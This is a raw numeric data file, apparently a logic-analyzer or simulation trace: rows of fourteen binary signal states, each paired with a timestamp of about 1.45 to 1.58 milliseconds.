1,1,0,1,1,0,0,0,0,0,0,0,0,1,1.4513960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,1,1.4514200e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,1,1.4514480e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,1,1.4514720e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,1,1.4515000e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4515200e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4515480e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4515720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4515800e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4515960e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4516200e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4516280e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4516760e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4517000e-03 1,1,0,1,1,1,0,0,0,0,0,0,0,0,1.4517040e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4517080e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4517240e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4517480e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4517720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4517960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4518200e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4518480e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4518720e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4519000e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4519480e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4519720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4519800e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4519960e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4520200e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4520280e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4520680e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4520960e-03 1,1,0,1,1,1,0,0,0,0,0,0,0,0,1.4521000e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4521040e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4521480e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4521720e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4521760e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4521960e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4522200e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4522440e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4522680e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4522960e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4523200e-03 1,1,0,1,1,1,0,0,0,0,0,0,0,0,1.4523240e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4523280e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4523720e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4523960e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4524200e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4524440e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4524960e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4525200e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4525240e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4525480e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4525720e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4525960e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4526200e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4526440e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4526680e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4526760e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4527200e-03 1,1,0,1,1,0,0,0,0,1,0,0,0,0,1.4527480e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4527520e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4527960e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4528200e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4528280e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4528440e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4528680e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4528960e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4529200e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4529480e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4529720e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4530240e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4530480e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4530520e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4531000e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4531240e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4531320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4531760e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4532000e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4532280e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4532520e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4532760e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4533000e-03 1,1,0,1,1,0,0,0,0,1,0,0,0,0,1.4533040e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4533080e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4533240e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4533480e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4533560e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4534000e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4534280e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4534520e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4534760e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4535000e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4535240e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4535480e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4535760e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4535800e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4536280e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4536520e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4536760e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4537000e-03 1,1,0,1,1,0,0,0,0,1,0,0,0,0,1.4537040e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4537080e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4537480e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4537760e-03 1,1,0,1,1,1,0,0,0,0,0,0,0,0,1.4537800e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4537840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4538280e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4538520e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4538560e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4538760e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4539000e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4539240e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4539480e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4539760e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4540000e-03 1,1,0,1,1,1,0,0,0,0,0,0,0,0,1.4540040e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4540080e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4540520e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4540760e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4541000e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4541240e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4541760e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4542000e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4542040e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4542280e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4542520e-03 1,1,0,1,1,1,0,0,0,0,0,0,0,0,1.4542560e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4542600e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4542760e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4543000e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4543240e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4543480e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4543560e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4544000e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4544280e-03 1,1,0,1,1,1,0,0,0,0,0,0,0,0,1.4544320e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4544360e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4544520e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4544760e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4545000e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4545240e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4545320e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4545480e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4545760e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4545800e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4546280e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4546520e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4546560e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4546760e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4547000e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4547240e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4547480e-03 1,1,0,1,1,1,0,0,0,1,0,0,1,0,1.4547760e-03 1,1,0,1,1,1,0,0,0,1,0,0,0,0,1.4548000e-03 1,1,0,1,1,1,0,0,0,0,0,0,0,0,1.4548040e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4548080e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4548560e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4548840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4549080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4549320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4549560e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4549800e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4550080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4550320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4550600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4550840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4551080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4551320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4551560e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4551800e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4552080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4552320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4552600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4552840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4553080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4553320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4553560e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4553800e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4554080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4554320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4554600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4554840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4555080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4555320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4555560e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4555800e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4556080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4556320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4556600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4556840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4557080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4557320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4557560e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4557800e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4558080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4558320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4558600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4558840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4559080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4559320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4559560e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4559800e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4560080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4560320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4560600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4560840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4561080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4561320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4561560e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4561800e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4562080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4562320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4562600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4562840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4563080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4563320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4563560e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4563800e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4564080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4564320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4564600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4564840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4565080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4565320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4565560e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4565800e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4566080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4566320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4566600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4566840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4567080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4567320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4567560e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4567800e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4568080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4568320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4568600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4568840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4569080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4569320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4569560e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4569800e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4570080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4570320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4570600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4570840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4571080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4571320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4571560e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4571800e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4572080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4572320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4572600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4572840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4573080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4573320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4573560e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4573800e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4574080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4574320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4574600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4574840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4575080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4575320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4575560e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4575800e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4576080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4576320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4576600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4576840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4577080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4577320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4577560e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4577800e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4578080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4578320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4578600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4578840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4579080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4579320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4579560e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4579800e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4580080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4580320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4580600e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4580840e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4581080e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4581320e-03 1,1,0,1,1,0,0,0,0,0,0,0,1,0,1.4581560e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,0,1.4581800e-03 1,1,0,1,1,0,0,0,0,0,0,0,0,1,1.5825920e-03 0,0,0,1,1,0,0,0,0,0,0,0,0,1,1.5828080e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.5828280e-03 0,0,1,1,1,0,0,0,0,0,0,1,0,1,1.5828600e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.5828840e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,1,1.5831760e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.5832000e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,1,1.5832040e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,1,1.5832480e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,1,1.5832760e-03 0,0,1,1,1,1,0,0,0,0,0,0,0,1,1.5832800e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.5832840e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,1,1.5833000e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.5833240e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,1,1.5833720e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,1,1.5833960e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,1,1.5834200e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5834280e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5834480e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5834520e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.5835000e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5835240e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5835320e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5835480e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5835720e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5835800e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.5836240e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5836480e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5836560e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5836760e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5837000e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5837240e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5837480e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5837720e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5837960e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5838200e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5838480e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5838520e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.5839000e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5839240e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5839320e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5839480e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5839720e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5839800e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.5840240e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5840480e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.5840760e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5841000e-03 0,0,1,1,1,1,0,0,0,0,0,0,0,0,1.5841040e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5841080e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5841240e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5841480e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5841720e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5841960e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5842200e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5842480e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5842520e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.5843000e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5843240e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5843320e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5843480e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5843720e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5843800e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.5844240e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5844480e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5844560e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5844760e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5845000e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5845240e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5845480e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5845720e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5845960e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5846040e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.5846200e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5846480e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.5847000e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5847240e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5847320e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5847480e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5847720e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5847960e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5848200e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5848480e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5848720e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5848760e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.5848960e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5849200e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.5849480e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5849720e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.5849960e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5850200e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5850280e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5850720e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5850960e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5851200e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5851480e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5851720e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5851960e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5852000e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.5852440e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5852680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5852760e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5852960e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5853200e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5853480e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5853720e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5853960e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5854200e-03 0,0,1,1,1,0,0,0,0,1,0,0,0,0,1.5854240e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5854280e-03 0,0,1,1,1,1,0,0,0,1,0,0,1,0,1.5854440e-03 0,0,1,1,1,1,0,0,0,1,0,0,0,0,1.5854680e-03 0,0,1,1,1,0,0,0,0,0,0,0,0,0,1.5854760e-03 0,0,1,1,1,0,0,0,0,0,0,0,1,0,1.5854960e-03 